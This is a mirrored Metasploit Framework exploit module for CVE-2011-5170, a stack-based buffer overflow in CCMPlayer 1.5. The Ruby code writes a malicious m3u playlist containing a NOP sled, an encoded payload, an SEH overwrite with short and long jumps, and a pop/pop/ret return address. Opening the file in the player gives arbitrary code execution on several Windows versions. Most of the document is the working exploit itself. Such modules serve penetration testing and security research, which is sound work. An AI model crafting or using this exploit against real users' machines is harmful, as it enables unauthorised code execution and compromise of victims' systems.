CoCalc -- ccmplayer_m3u

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
¹⁹⁸¹³ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
16
        'Description' => %q{
17
          This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
18
          a m3u playlist with a long track name, a SEH exception record can be overwritten
19
          with parts of the controllable buffer. SEH execution is triggered after an
20
          invalid read of an injectable address, thus allowing arbitrary code execution.
21
          This module works on multiple Windows platforms including: Windows XP SP3,
22
          Windows Vista, and Windows 7.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => ['Rh0'],	# discovery and metasploit module
26
        'References' => [
27
          ['CVE', '2011-5170'],
28
          ['OSVDB', '77453'],
29
          ['EDB', '18178']
30
        ],
31
        'DefaultOptions' => {
32
          'EXITFUNC' => 'process',
33
          'DisablePayloadHandler' => true
34
        },
35
        'Payload' => {
36
          'Space' => 0x1000,
37
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
38
          'DisableNops' => true,
39
          'StackAdjustment' => -3500,
40
        },
41
        'Platform'	=> 'win',
42
        'Targets' => [
43
          [
44
            'CCMPlayer 1.5',
45
            {
46
              # pop esi / pop ebx / ret (in ccmplay.exe)
47
              # tweak it if necessary
48
              'Ret' => 0x00403ca7,	# last NULL in buffer is accepted
49
              'Offset' => 0x1000
50
            }
51
          ]
52
        ],
53
        'Privileged' => false,
54
        'DisclosureDate' => '2011-11-30', # to my knowledge
55
        'DefaultTarget' => 0,
56
        'Notes' => {
57
          'Reliability' => UNKNOWN_RELIABILITY,
58
          'Stability' => UNKNOWN_STABILITY,
59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
        }
61
      )
62
    )
63

64
    register_options(
65
      [
66
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']),
67
      ]
68
    )
69
  end
70

71
  def exploit
72
    m3u = "C:\\"
73
    # shellcode
74
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
75
    m3u << payload.encoded
76
    # junk
77
    m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
78
    # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
79
    # to trigger SEH
80
    m3u << [0xffffffff].pack("V")
81
    # pad
82
    m3u << rand_text_alpha_upper(3)
83
    # long jmp: jmp far back to shellcode
84
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
85
    # NSEH: jmp short back to long jmp instruction
86
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
87
    # pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
88
    m3u << rand_text_alpha_upper(2)
89
    # SEH Exception Handler Address -> p/p/r
90
    m3u << [target.ret].pack("V")
91
    m3u << ".mp3\r\n"	# no crash without it
92

93
    print_status("Creating '#{datastore['FILENAME']}' file ...")
94

95
    # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
96
    file_create(m3u)
97
  end
98
end
99

100
Product

Resources

Company
